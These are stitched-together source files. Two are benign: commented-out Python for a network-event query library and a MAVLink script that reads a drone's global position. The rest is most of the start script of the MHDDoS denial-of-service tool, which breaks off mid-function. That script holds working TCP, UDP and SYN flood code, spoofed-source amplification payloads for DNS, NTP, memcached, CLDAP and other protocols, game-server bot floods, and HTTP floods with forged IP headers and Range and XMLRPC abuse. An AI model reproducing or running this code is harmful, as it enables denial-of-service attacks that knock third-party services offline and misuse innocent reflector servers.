# (x,(boolean,y)) = tup.type
# if boolean != "boolean":
# raise types.FTypeException(
# "%s is not of type %s" % (tup, "a * (boolean * a)"))
# return tup
# return LoopPre(
# (False,None),
# Compose(
# Lift(calmupdate, type_fun=type_fun),
# Filter(calmfilter)),
# c_type=types.FType(("boolean", None)))
#
## Beacon : E int
#def Beacon(n):
# return\
# Seconds() >>\
# (Lift(lambda x:(x // n)*n,types.FType("integer"), types.FType("integer")) >> Calm())
#
## Divide : ((a * a) -> Bool) -> EF a (E a)
#def Divide(feq):
# return (Group(lambda x:None, b_type=types.FType(None)) >>
# Regroup(feq) >>
# Snd())
#
## GroupByTime : ???
#def GroupByTime(n):
# # types intentionally left none
# return (Lift(lambda (o,ps): (o,Merge(ps,Beacon(n)))) >>
# Regroup(net.beacon_sp()))
#
## ReGroupByTime : ???
#def ReGroupByTime(n):
# # types intentionally left none
# def add_beacon((x, s)):
# return (x, Merge(s, Beacon(n)))
# def append_packets(l, (p,b)):
# if (p is None):
# return l[:]
# else:
# return list_append(l, p)
# sf = (Lift(add_beacon) >>
# Regroup(net.beacon_sp()) >>
# Ungroup(None, append_packets, []))
# return sf
#
## SplitByTime : ???
#def SplitByTime(n):
# # types intentionally left none
# sf = (Group(constant_gp(None)) >>
# ReGroupByTime(n) >>
# Snd())
# return sf
#
## Accum : a * (a -> b -> a) -> EF b a
#def Accum(init, f, init_type=None):
# def body((next,last)):
# newout = f(next,last)
# return (newout,newout)
# return LoopPre(init, Lift(body,type_fun=lambda x:init_type), c_type=init_type)
#
## Tally : EF a int
#def Tally():
# return Lift(lambda x: 1, type_fun=lambda a : types.FType("integer"))
#
## Sum : EF int int
#def Sum():
# return Accum(0,(lambda x, y: x + y), init_type=types.FType("integer"))
#
## LiftF : (unit -> EF a b) -> EF (E a) (E b)
#def LiftF(eff):
# # TODO(astory): figure out typing
# return Lift(lambda ea: Apply(ea, eff ()))
#
## StickyMerge : E (a option) * E (b option) -> E (a * b)
#def StickyMerge(e1,e2):
# # TODO(astory): figure out typing
# def f(((x,y),(xl,yl))):
# retx = xl if (x is None) else x
# rety = yl if (y is None) else y
# return ((retx,rety),(retx,rety))
# return (Apply(Merge(e1,e2),LoopPre((None,None),Lift(f))))
#
###############
## UNIT TESTS #
###############
#
#unit_test([1,2,3,4,5],Dup(),[(1,1),(2,2),(3,3),(4,4),(5,5)])
#unit_test([1,2,3,4,5,6,7,8,9,10], Filter(lambda x: x == 5), [5])
#unit_test([1,2,3,4,5,6,7,8,9,10], Filter(lambda x: x > 5), [6,7,8,9,10])
#unit_test([1,10,100,1000,10000],Tally(),[1,1,1,1,1])
#unit_test([1,10,100,1000,10000],Compose(Tally(),Sum()),[1,2,3,4,5])
#unit_test_merge([('a',None),(None,1),('b',None),(None,2),(None,3),('c',None)],
# StickyMerge,
# [('a',None),('a',1),('b',1),('b',2),('b',3),('c',3)])
#
## functional list append
#def list_append(l,x):
# l_copy = l[:]
# l_copy.append(x)
# return l_copy
#
#unit_test([1,2,3,4,5,6,7,8,9,10],
# Group(lambda x: x / 5) >>
# Regroup(lambda x,y:True) >>
# Ungroup(None,list_append,[]),
# [(0,[1,2,3,4]), (1,[5,6,7,8,9]), (2,[10])])
#
#unit_test([1,2,3,4,5,6,7,8,9,10],
# Group(lambda x: x / 5) >>
# Regroup(lambda x,y:False) >>
# Ungroup(None,lambda acc,x:x,None),
# [(0,1),(0,2),(0,3),(1,5),(1,6),(1,7),(1,8),(0,4),(1,9),(2,10)])
#
#unit_test([1,2,3,4,5,6,7,8,9,10],
# Group(lambda x: x / 5) >>
# Regroup(lambda x,y:False) >>
# Ungroup(1,lambda acc,x:x,None),
# [(0,1),(0,2),(0,3),(0,4),(1,5),(1,6),(1,7),(1,8),(1,9),(2,10)])
#
#unit_test([1,2,3,4,5,6,7,8,9,10],
# Divide(lambda x1,x2: x1 / 5 == x2 / 5) >>
# Lift(lambda x: (None,x)) >>
# Ungroup(None,list_append,[]) >>
# Snd(),
# [[1,2,3,4],[5,6,7,8,9],[10]])
###########
# Queries #
###########
# Queries
#class FQuery:
# def __init__(self,typ,num,fp,gp,sp,win,compose):
# self.complete = False
# self.typ = typ
# self.num = num
# self.fp = fp
# self.gp = gp
# self.sp = sp
# self.win = win
# self.compose = compose
# def __rshift__(self,other):
# other_name = other.__class__.__name__
# if other_name == "FEventFun":
# return Subscribe(self) >> other
# elif other_name == "FListener":
# return Subscribe(self) >> other
# else:
# raise util.IllegalArgument("Cannot compose FQuery and %s" % other_name)
# def __mul__(self,other):
# other_name = other.__class__.__name__
# if other_name == "FQuery":
# return other.compose(self)
# else:
# raise util.IllegalArgument("Cannot compose FQuery and %s" % other_name)
#
#def Select(x):
# def compose(q):
# q.typ = x
# q.complete = True
# return q
# q = FQuery(x,None,net.true_fp(),[],[],None,compose)
# q.complete = True
# return q
#
#def Where(fp):
# def compose(q):
# q.fp = net.and_fp([q.fp,fp])
# return q
# return FQuery('packets',None,fp,[],[],None,compose)
#
#def GroupBy(gp):
# def compose(q):
# for f in gp:
# q.gp.append(f)
# return q
# return FQuery('packets',None,net.true_fp(),gp,[],None,compose)
#
#def SplitWhen(sp):
# def compose(q):
# for f in sp:
# q.sp.append(f)
# return q
# return FQuery('packets',None,net.true_fp(),[],sp,None,compose)
#
#def Limit(num):
# def compose(q):
# q.num = num
# return q
# return FQuery('packets',num,net.true_fp(),[],[],None,compose)
#
#def Every(win):
# def compose(q):
# q.win = win
# return q
# return FQuery('packets',None,net.true_fp(),[],[],win,compose)
#
## subscribe
#def Subscribe(q):
# if not q.complete:
# raise util.IllegalArgument("FQuery must at least have a Select")
# return rts.add_query(q)
#
##packets
#def Packets():
# return Subscribe(Select('packets'))
|
view_global_position.py
|
#!/usr/bin/env python3
# Copyright 2020, NTRobotics
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from pymavlink import mavutil
from pymavlink.mavutil import mavlink
import threading
import time
from utils import main_utils, param_utils
connection = None
need_reboot = False
def check_and_set_param(param, param_id, param_value):
global need_reboot
if param.param_id != param_id:
return
remote_value = param_utils.decode_param(param)
if isinstance(remote_value,int):
differ = (remote_value != param_value)
else:
differ = (abs(remote_value - param_value) > 0.001)
if differ:
param_utils.set_parameter(connection, param_id, param_value)
need_reboot = True
stamp_offset_ms = None
def send_attitude():
global stamp_offset_ms
while True:
stamp = int(time.time() * 1000) + stamp_offset_ms
connection.mav.attitude_send(stamp, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0)
time.sleep(0.05)
if __name__ == '__main__':
connection = main_utils.connect()
main_utils.start_sending_heartbeat(connection)
connection.wait_heartbeat()
params = param_utils.list_params(connection)
for p in params:
print('Param %s = %3.6f' % (p.param_id, p.param_value))
check_and_set_param(p, 'SAVE_MAP', 0)
check_and_set_param(p, 'LOAD_MAP', 0)
check_and_set_param(p, 'SEND_ORIGIN', 0)
check_and_set_param(p, 'INIT_ALT', 1.0)
if need_reboot:
print('Parameters were changed. Rebooting, please wait...')
main_utils.reboot(connection)
main_utils.stop_sending_heartbeat(connection)
del connection
time.sleep(5)
connection = main_utils.connect()
main_utils.start_sending_heartbeat(connection)
connection.wait_heartbeat()
print('Got heartbeat.')
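# The ATTITUDE messages sent by send_attitude() must be stamped in the
# autopilot's time base rather than the host's. SYSTEM_TIME reports both the
# vehicle's wall clock (time_unix_usec) and its time since boot
# (time_boot_ms), so (vehicle_unix - host_now) + (boot - vehicle_unix)
# reduces to (vehicle boot time - host time); adding that offset to
# time.time() approximates the vehicle's time_boot_ms for outgoing stamps.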
sys_time_msg = connection.recv_match(type='SYSTEM_TIME', blocking=True)
now_us = int(time.time() * 1e6)
time_diff_us = sys_time_msg.time_unix_usec - now_us
boot_offset_us = sys_time_msg.time_boot_ms * 1000 - sys_time_msg.time_unix_usec
stamp_offset_ms = int((time_diff_us + boot_offset_us) / 1000)
print('Stamp offset is %d ms' % stamp_offset_ms)
attitude_thread = threading.Thread(target=send_attitude, daemon=True)
attitude_thread.start()
main_utils.send_command(
connection,
mavlink.MAV_CMD_SET_MESSAGE_INTERVAL,
param1=float(mavlink.MAVLINK_MSG_ID_GLOBAL_POSITION_INT),
param2=1e6
)
print('Press Ctrl-C to terminate receiving global position messages.')
try:
while True:
msg = connection.recv_match(type=['HEARTBEAT', 'GLOBAL_POSITION_INT', 'STATUSTEXT'], blocking=True)
if msg.get_type() == 'HEARTBEAT':
old_state = msg.system_status
if msg.system_status == mavlink.MAV_STATE_EMERGENCY:
print("*** NO COORDINATES ***")
elif msg.system_status == mavlink.MAV_STATE_CRITICAL:
print("*** ONLY ALTITUDE ***")
elif msg.system_status == mavlink.MAV_STATE_STANDBY:
print("*** FULL COORDINATES ***")
else:
print("*** UNEXPECTED SYSTEM STATUS (%d) ***" % msg.system_status)
elif msg.get_type() == 'GLOBAL_POSITION_INT':
print('Global Position message received (ms,lat,lon,alt,rel_alt,vx,vy,vz,hdg): %d, %.5f, %.5f, %.3f,'
' %.3f, %.3f, %.3f, %.3f, %.3f' %
(msg.time_boot_ms, msg.lat/1e7, msg.lon/1e7, msg.alt/1e3, msg.relative_alt, msg.vx, msg.vy, msg.vz, msg.hdg)
)
elif msg.get_type() == 'STATUSTEXT':
main_utils.handle_statustext(connection, msg)
else:
print('Unexpected message %s' % msg.get_type())
except KeyboardInterrupt:
exit(0)
|
start.py
|
#!/usr/bin/env python3
from concurrent.futures import ThreadPoolExecutor, as_completed
from contextlib import suppress
from itertools import cycle
from json import load
from logging import basicConfig, getLogger, shutdown
from math import log2, trunc
from multiprocessing import RawValue
from os import urandom as randbytes
from pathlib import Path
from random import choice as randchoice
from random import randint
from socket import (AF_INET, IP_HDRINCL, IPPROTO_IP, IPPROTO_TCP, IPPROTO_UDP, SOCK_DGRAM,
SOCK_RAW, SOCK_STREAM, TCP_NODELAY, gethostbyname,
gethostname, socket)
from ssl import CERT_NONE, SSLContext, create_default_context
from struct import pack as data_pack
from subprocess import run
from sys import argv
from sys import exit as _exit
from threading import Event, Thread
from time import sleep, time
from typing import Any, List, Set, Tuple
from urllib import parse
from uuid import UUID, uuid4
from PyRoxy import Proxy, ProxyChecker, ProxyType, ProxyUtiles
from PyRoxy import Tools as ProxyTools
from certifi import where
from cfscrape import create_scraper
from dns import resolver
from icmplib import ping
from impacket.ImpactPacket import IP, TCP, UDP, Data
from psutil import cpu_percent, net_io_counters, process_iter, virtual_memory
from requests import Response, Session, exceptions, get
from yarl import URL
basicConfig(format='[%(asctime)s - %(levelname)s] %(message)s',
datefmt="%H:%M:%S")
logger = getLogger("MHDDoS")
logger.setLevel("INFO")
ctx: SSLContext = create_default_context(cafile=where())
ctx.check_hostname = False
ctx.verify_mode = CERT_NONE
__version__: str = "2.4 SNAPSHOT"
__dir__: Path = Path(__file__).parent
__ip__: Any = None
def getMyIPAddress():
global __ip__
if __ip__:
return __ip__
with suppress(Exception):
__ip__ = get('https://api.my-ip.io/ip', timeout=.1).text
with suppress(Exception):
__ip__ = get('https://ipwhois.app/json/', timeout=.1).json()["ip"]
with suppress(Exception):
__ip__ = get('https://ipinfo.io/json', timeout=.1).json()["ip"]
with suppress(Exception):
__ip__ = ProxyTools.Patterns.IP.search(get('http://checkip.dyndns.org/', timeout=.1).text)
with suppress(Exception):
__ip__ = ProxyTools.Patterns.IP.search(get('https://spaceiran.com/myip/', timeout=.1).text)
with suppress(Exception):
__ip__ = get('https://ip.42.pl/raw', timeout=.1).text
return getMyIPAddress()
def exit(*message):
if message:
logger.error(" ".join(message))
shutdown()
_exit(1)
class Methods:
LAYER7_METHODS: Set[str] = {
"CFB", "BYPASS", "GET", "POST", "OVH", "STRESS", "DYN", "SLOW", "HEAD",
"NULL", "COOKIE", "PPS", "EVEN", "GSB", "DGB", "AVB", "CFBUAM",
"APACHE", "XMLRPC", "BOT", "BOMB", "DOWNLOADER"
}
LAYER4_METHODS: Set[str] = {
"TCP", "UDP", "SYN", "VSE", "MINECRAFT", "MEM", "NTP", "DNS", "ARD",
"CHAR", "RDP", "MCBOT", "CONNECTION", "CPS", "FIVEM", "TS3", "MCPE",
"CLDAP"
}
ALL_METHODS: Set[str] = {*LAYER4_METHODS, *LAYER7_METHODS}
google_agents = [
"Mozila/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
"Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, "
"like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; "
"+http://www.google.com/bot.html)) "
"Googlebot/2.1 (+http://www.google.com/bot.html)",
"Googlebot/2.1 (+http://www.googlebot.com/bot.html)"
]
class Counter(object):
def __init__(self, value=0):
self._value = RawValue('i', value)
def __iadd__(self, value):
self._value.value += value
return self
def __int__(self):
return self._value.value
def set(self, value):
self._value.value = value
return self
REQUESTS_SENT = Counter()
BYTES_SEND = Counter()
class Tools:
@staticmethod
def humanbytes(i: int, binary: bool = False, precision: int = 2):
MULTIPLES = [
"B", "k{}B", "M{}B", "G{}B", "T{}B", "P{}B", "E{}B", "Z{}B", "Y{}B"
]
if i > 0:
base = 1024 if binary else 1000
multiple = trunc(log2(i) / log2(base))
value = i / pow(base, multiple)
suffix = MULTIPLES[multiple].format("i" if binary else "")
return f"{value:.{precision}f} {suffix}"
else:
return f"-- B"
@staticmethod
def humanformat(num: int, precision: int = 2):
suffixes = ['', 'k', 'm', 'g', 't', 'p']
if num > 999:
obje = sum(
[abs(num / 1000.0 ** x) >= 1 for x in range(1, len(suffixes))])
return f'{num / 1000.0 ** obje:.{precision}f}{suffixes[obje]}'
else:
return num
@staticmethod
def sizeOfRequest(res: Response) -> int:
size: int = len(res.request.method)
size += len(res.request.url)
size += len('\r\n'.join(f'{key}: {value}'
for key, value in res.request.headers.items()))
return size
@staticmethod
def randchr(lengh: int) -> str:
return "".join([chr(randint(0, 1000)) for _ in range(lengh)]).strip()
@staticmethod
def send(sock: socket, packet: bytes):
global BYTES_SEND, REQUESTS_SENT
if not sock.send(packet):
return False
BYTES_SEND += len(packet)
REQUESTS_SENT += 1
return True
@staticmethod
def sendto(sock, packet, target):
global BYTES_SEND, REQUESTS_SENT
if not sock.sendto(packet, target):
return False
BYTES_SEND += len(packet)
REQUESTS_SENT += 1
return True
@staticmethod
def safe_close(sock=None):
if sock:
sock.close()
class Minecraft:
@staticmethod
def varint(d: int) -> bytes:
o = b''
while True:
b = d & 0x7F
d >>= 7
o += data_pack("B", b | (0x80 if d > 0 else 0))
if d == 0:
break
return o
@staticmethod
def data(*payload: bytes) -> bytes:
payload = b''.join(payload)
return Minecraft.varint(len(payload)) + payload
@staticmethod
def short(integer: int) -> bytes:
return data_pack('>H', integer)
@staticmethod
def handshake(target: Tuple[str, int], version: int, state: int) -> bytes:
return Minecraft.data(Minecraft.varint(0x00),
Minecraft.varint(version),
Minecraft.data(target[0].encode()),
Minecraft.short(target[1]),
Minecraft.varint(state))
@staticmethod
def handshake_forwarded(target: Tuple[str, int], version: int, state: int, ip: str, uuid: UUID) -> bytes:
return Minecraft.data(Minecraft.varint(0x00),
Minecraft.varint(version),
Minecraft.data(
target[0].encode(),
b"\x00",
ip.encode(),
b"\x00",
uuid.hex.encode()
),
Minecraft.short(target[1]),
Minecraft.varint(state))
@staticmethod
def login(username: str) -> bytes:
if isinstance(username, str):
username = username.encode()
return Minecraft.data(Minecraft.varint(0x00),
Minecraft.data(username))
@staticmethod
def keepalive(num_id: int) -> bytes:
return Minecraft.data(Minecraft.varint(0x00),
Minecraft.varint(num_id))
@staticmethod
def chat(message: str) -> bytes:
return Minecraft.data(Minecraft.varint(0x01),
Minecraft.data(message.encode()))
# noinspection PyBroadException,PyUnusedLocal
class Layer4(Thread):
_method: str
_target: Tuple[str, int]
_ref: Any
SENT_FLOOD: Any
_amp_payloads = cycle
_proxies: List[Proxy] = None
def __init__(self,
target: Tuple[str, int],
ref: List[str] = None,
method: str = "TCP",
synevent: Event = None,
proxies: Set[Proxy] = None):
Thread.__init__(self, daemon=True)
self._amp_payload = None
self._amp_payloads = cycle([])
self._ref = ref
self._method = method
self._target = target
self._synevent = synevent
if proxies:
self._proxies = list(proxies)
def run(self) -> None:
if self._synevent: self._synevent.wait()
self.select(self._method)
while self._synevent.is_set():
self.SENT_FLOOD()
def open_connection(self,
conn_type=AF_INET,
sock_type=SOCK_STREAM,
proto_type=IPPROTO_TCP):
if self._proxies:
s = randchoice(self._proxies).open_socket(
conn_type, sock_type, proto_type)
else:
s = socket(conn_type, sock_type, proto_type)
s.setsockopt(IPPROTO_TCP, TCP_NODELAY, 1)
s.connect(self._target)
return s
def select(self, name):
self.SENT_FLOOD = self.TCP
if name == "UDP": self.SENT_FLOOD = self.UDP
if name == "SYN": self.SENT_FLOOD = self.SYN
if name == "VSE": self.SENT_FLOOD = self.VSE
if name == "TS3": self.SENT_FLOOD = self.TS3
if name == "MCPE": self.SENT_FLOOD = self.MCPE
if name == "FIVEM": self.SENT_FLOOD = self.FIVEM
if name == "MINECRAFT": self.SENT_FLOOD = self.MINECRAFT
if name == "CPS": self.SENT_FLOOD = self.CPS
if name == "CONNECTION": self.SENT_FLOOD = self.CONNECTION
if name == "MCBOT": self.SENT_FLOOD = self.MCBOT
if name == "RDP":
self._amp_payload = (
b'\x00\x00\x00\x00\x00\x00\x00\xff\x00\x00\x00\x00\x00\x00\x00\x00',
3389)
self.SENT_FLOOD = self.AMP
self._amp_payloads = cycle(self._generate_amp())
if name == "CLDAP":
self._amp_payload = (b'\x30\x25\x02\x01\x01\x63\x20\x04\x00\x0a\x01\x00\x0a\x01\x00\x02\x01\x00\x02\x01\x00'
b'\x01\x01\x00\x87\x0b\x6f\x62\x6a\x65\x63\x74\x63\x6c\x61\x73\x73\x30\x00', 389)
self.SENT_FLOOD = self.AMP
self._amp_payloads = cycle(self._generate_amp())
if name == "MEM":
self._amp_payload = (
b'\x00\x01\x00\x00\x00\x01\x00\x00gets p h e\n', 11211)
self.SENT_FLOOD = self.AMP
self._amp_payloads = cycle(self._generate_amp())
if name == "CHAR":
self._amp_payload = (b'\x01', 19)
self.SENT_FLOOD = self.AMP
self._amp_payloads = cycle(self._generate_amp())
if name == "ARD":
self._amp_payload = (b'\x00\x14\x00\x00', 3283)
self.SENT_FLOOD = self.AMP
self._amp_payloads = cycle(self._generate_amp())
if name == "NTP":
self._amp_payload = (b'\x17\x00\x03\x2a\x00\x00\x00\x00', 123)
self.SENT_FLOOD = self.AMP
self._amp_payloads = cycle(self._generate_amp())
if name == "DNS":
self._amp_payload = (
b'\x45\x67\x01\x00\x00\x01\x00\x00\x00\x00\x00\x01\x02\x73\x6c\x00\x00\xff\x00\x01\x00'
b'\x00\x29\xff\xff\x00\x00\x00\x00\x00\x00', 53)
self.SENT_FLOOD = self.AMP
self._amp_payloads = cycle(self._generate_amp())
def TCP(self) -> None:
s = None
with suppress(Exception), self.open_connection(AF_INET, SOCK_STREAM) as s:
while Tools.send(s, randbytes(1024)):
continue
Tools.safe_close(s)
def MINECRAFT(self) -> None:
handshake = Minecraft.handshake(self._target, 74, 1)
ping = Minecraft.data(b'\x00')
s = None
with suppress(Exception), self.open_connection(AF_INET, SOCK_STREAM) as s:
while Tools.send(s, handshake):
Tools.send(s, ping)
Tools.safe_close(s)
def CPS(self) -> None:
global REQUESTS_SENT
s = None
with suppress(Exception), self.open_connection(AF_INET, SOCK_STREAM) as s:
REQUESTS_SENT += 1
Tools.safe_close(s)
def alive_connection(self) -> None:
s = None
with suppress(Exception), self.open_connection(AF_INET, SOCK_STREAM) as s:
while s.recv(1):
continue
Tools.safe_close(s)
def CONNECTION(self) -> None:
global REQUESTS_SENT
with suppress(Exception):
Thread(target=self.alive_connection).start()
REQUESTS_SENT += 1
def UDP(self) -> None:
s = None
with suppress(Exception), socket(AF_INET, SOCK_DGRAM) as s:
while Tools.sendto(s, randbytes(1024), self._target):
continue
Tools.safe_close(s)
def SYN(self) -> None:
payload = self._genrate_syn()
s = None
with suppress(Exception), socket(AF_INET, SOCK_RAW, IPPROTO_TCP) as s:
s.setsockopt(IPPROTO_IP, IP_HDRINCL, 1)
while Tools.sendto(s, payload, self._target):
continue
Tools.safe_close(s)
def AMP(self) -> None:
payload = next(self._amp_payloads)
s = None
with suppress(Exception), socket(AF_INET, SOCK_RAW,
IPPROTO_UDP) as s:
s.setsockopt(IPPROTO_IP, IP_HDRINCL, 1)
while Tools.sendto(s, *payload):
continue
Tools.safe_close(s)
def MCBOT(self) -> None:
s = None
with suppress(Exception), self.open_connection(AF_INET, SOCK_STREAM) as s:
Tools.send(s, Minecraft.handshake_forwarded(self._target,
47,
2,
ProxyTools.Random.rand_ipv4(),
uuid4()))
Tools.send(s, Minecraft.login(f"MHDDoS_{ProxyTools.Random.rand_str(5)}"))
sleep(1.5)
c = 360
while Tools.send(s, Minecraft.keepalive(randint(1111111, 9999999))):
c -= 1
if c:
continue
c = 360
Tools.send(s, Minecraft.chat(Tools.randchr(100)))
Tools.safe_close(s)
def VSE(self) -> None:
global BYTES_SEND, REQUESTS_SENT
payload = (b'\xff\xff\xff\xff\x54\x53\x6f\x75\x72\x63\x65\x20\x45\x6e\x67\x69\x6e\x65'
b'\x20\x51\x75\x65\x72\x79\x00')
with socket(AF_INET, SOCK_DGRAM) as s:
while Tools.sendto(s, payload, self._target):
continue
Tools.safe_close(s)
def FIVEM(self) -> None:
global BYTES_SEND, REQUESTS_SENT
payload = b'\xff\xff\xff\xffgetinfo xxx\x00\x00\x00'
with socket(AF_INET, SOCK_DGRAM) as s:
while Tools.sendto(s, payload, self._target):
continue
Tools.safe_close(s)
def TS3(self) -> None:
global BYTES_SEND, REQUESTS_SENT
payload = b'\x05\xca\x7f\x16\x9c\x11\xf9\x89\x00\x00\x00\x00\x02'
with socket(AF_INET, SOCK_DGRAM) as s:
while Tools.sendto(s, payload, self._target):
continue
Tools.safe_close(s)
def MCPE(self) -> None:
global BYTES_SEND, REQUESTS_SENT
payload = (b'\x61\x74\x6f\x6d\x20\x64\x61\x74\x61\x20\x6f\x6e\x74\x6f\x70\x20\x6d\x79\x20\x6f'
b'\x77\x6e\x20\x61\x73\x73\x20\x61\x6d\x70\x2f\x74\x72\x69\x70\x68\x65\x6e\x74\x20'
b'\x69\x73\x20\x6d\x79\x20\x64\x69\x63\x6b\x20\x61\x6e\x64\x20\x62\x61\x6c\x6c'
b'\x73')
with socket(AF_INET, SOCK_DGRAM) as s:
while Tools.sendto(s, payload, self._target):
continue
Tools.safe_close(s)
def _genrate_syn(self) -> bytes:
ip: IP = IP()
ip.set_ip_src(getMyIPAddress())
ip.set_ip_dst(self._target[0])
tcp: TCP = TCP()
tcp.set_SYN()
tcp.set_th_dport(self._target[1])
tcp.set_th_sport(randint(1, 65535))
ip.contains(tcp)
return ip.get_packet()
def _generate_amp(self):
payloads = []
for ref in self._ref:
ip: IP = IP()
ip.set_ip_src(self._target[0])
ip.set_ip_dst(ref)
ud: UDP = UDP()
ud.set_uh_dport(self._amp_payload[1])
ud.set_uh_sport(self._target[1])
ud.contains(Data(self._amp_payload[0]))
ip.contains(ud)
payloads.append((ip.get_packet(), (ref, self._amp_payload[1])))
return payloads
# noinspection PyBroadException,PyUnusedLocal
class HttpFlood(Thread):
_proxies: List[Proxy] = None
_payload: str
_defaultpayload: Any
_req_type: str
_useragents: List[str]
_referers: List[str]
_target: URL
_method: str
_rpc: int
_synevent: Any
SENT_FLOOD: Any
def __init__(self,
target: URL,
host: str,
method: str = "GET",
rpc: int = 1,
synevent: Event = None,
useragents: Set[str] = None,
referers: Set[str] = None,
proxies: Set[Proxy] = None) -> None:
Thread.__init__(self, daemon=True)
self.SENT_FLOOD = None
self._synevent = synevent
self._rpc = rpc
self._method = method
self._target = target
self._host = host
self._raw_target = (self._host, (self._target.port or 80))
if not self._target.host[len(self._target.host) - 1].isdigit():
self._raw_target = (self._host, (self._target.port or 80))
if not referers:
referers: List[str] = [
"https://www.facebook.com/l.php?u=https://www.facebook.com/l.php?u=",
",https://www.facebook.com/sharer/sharer.php?u=https://www.facebook.com/sharer"
"/sharer.php?u=",
",https://drive.google.com/viewerng/viewer?url=",
",https://www.google.com/translate?u="
]
self._referers = list(referers)
if proxies:
self._proxies = list(proxies)
if not useragents:
useragents: List[str] = [
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 '
'Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 '
'Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 '
'Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0'
]
self._useragents = list(useragents)
self._req_type = self.getMethodType(method)
self._defaultpayload = "%s %s HTTP/%s\r\n" % (self._req_type,
target.raw_path_qs, randchoice(['1.0', '1.1', '1.2']))
self._payload = (self._defaultpayload +
'Accept-Encoding: gzip, deflate, br\r\n'
'Accept-Language: en-US,en;q=0.9\r\n'
'Cache-Control: max-age=0\r\n'
'Connection: Keep-Alive\r\n'
'Sec-Fetch-Dest: document\r\n'
'Sec-Fetch-Mode: navigate\r\n'
'Sec-Fetch-Site: none\r\n'
'Sec-Fetch-User: ?1\r\n'
'Sec-Gpc: 1\r\n'
'Pragma: no-cache\r\n'
'Upgrade-Insecure-Requests: 1\r\n')
def run(self) -> None:
if self._synevent: self._synevent.wait()
self.select(self._method)
while self._synevent.is_set():
self.SENT_FLOOD()
@property
def SpoofIP(self) -> str:
spoof: str = ProxyTools.Random.rand_ipv4()
return ("X-Forwarded-Proto: Http\r\n"
f"X-Forwarded-Host: {self._target.raw_host}, 1.1.1.1\r\n"
f"Via: {spoof}\r\n"
f"Client-IP: {spoof}\r\n"
f'X-Forwarded-For: {spoof}\r\n'
f'Real-IP: {spoof}\r\n')
def generate_payload(self, other: str = None) -> bytes:
return str.encode((self._payload +
"Host: %s\r\n" % self._target.authority +
self.randHeadercontent +
(other if other else "") +
"\r\n"))
def open_connection(self) -> socket:
if self._proxies:
sock = randchoice(self._proxies).open_socket(AF_INET, SOCK_STREAM)
else:
sock = socket(AF_INET, SOCK_STREAM)
sock.setsockopt(IPPROTO_TCP, TCP_NODELAY, 1)
sock.connect(self._raw_target)
if self._target.scheme.lower() == "https":
sock = ctx.wrap_socket(sock,
server_hostname=self._target.host,
server_side=False,
do_handshake_on_connect=True,
suppress_ragged_eofs=True)
return sock
@property
def randHeadercontent(self) -> str:
return (f"User-Agent: {randchoice(self._useragents)}\r\n"
f"Referrer: {randchoice(self._referers)}{parse.quote(self._target.human_repr())}\r\n" +
self.SpoofIP)
@staticmethod
def getMethodType(method: str) -> str:
return "GET" if {method.upper()} & {"CFB", "CFBUAM", "GET", "COOKIE", "OVH", "EVEN",
"DYN", "SLOW", "PPS", "APACHE",
"BOT", } \
else "POST" if {method.upper()} & {"POST", "XMLRPC", "STRESS"} \
else "HEAD" if {method.upper()} & {"GSB", "HEAD"} \
else "REQUESTS"
def POST(self) -> None:
payload: bytes = self.generate_payload(
("Content-Length: 44\r\n"
"X-Requested-With: XMLHttpRequest\r\n"
"Content-Type: application/json\r\n\r\n"
'{"data": %s}') % ProxyTools.Random.rand_str(32))[:-2]
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def STRESS(self) -> None:
payload: bytes = self.generate_payload(
(f"Content-Length: 524\r\n"
"X-Requested-With: XMLHttpRequest\r\n"
"Content-Type: application/json\r\n\r\n"
'{"data": %s}') % ProxyTools.Random.rand_str(512))[:-2]
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def COOKIES(self) -> None:
payload: bytes = self.generate_payload(
"Cookie: _ga=GA%s;"
" _gat=1;"
" __cfduid=dc232334gwdsd23434542342342342475611928;"
" %s=%s\r\n" %
(randint(1000, 99999), ProxyTools.Random.rand_str(6),
ProxyTools.Random.rand_str(32)))
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def APACHE(self) -> None:
payload: bytes = self.generate_payload(
"Range: bytes=0-,%s" % ",".join("5-%d" % i
for i in range(1, 1024)))
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def XMLRPC(self) -> None:
payload: bytes = self.generate_payload(
("Content-Length: 345\r\n"
"X-Requested-With: XMLHttpRequest\r\n"
"Content-Type: application/xml\r\n\r\n"
"<?xml version='1.0' encoding='iso-8859-1'?>"
"<methodCall><methodName>pingback.ping</methodName>"
"<params><param><value><string>%s</string></value>"
"</param><param><value><string>%s</string>"
"</value></param></params></methodCall>") %
(ProxyTools.Random.rand_str(64),
ProxyTools.Random.rand_str(64)))[:-2]
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def PPS(self) -> None:
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, self._defaultpayload)
Tools.safe_close(s)
def GET(self) -> None:
payload: bytes = self.generate_payload()
s = None
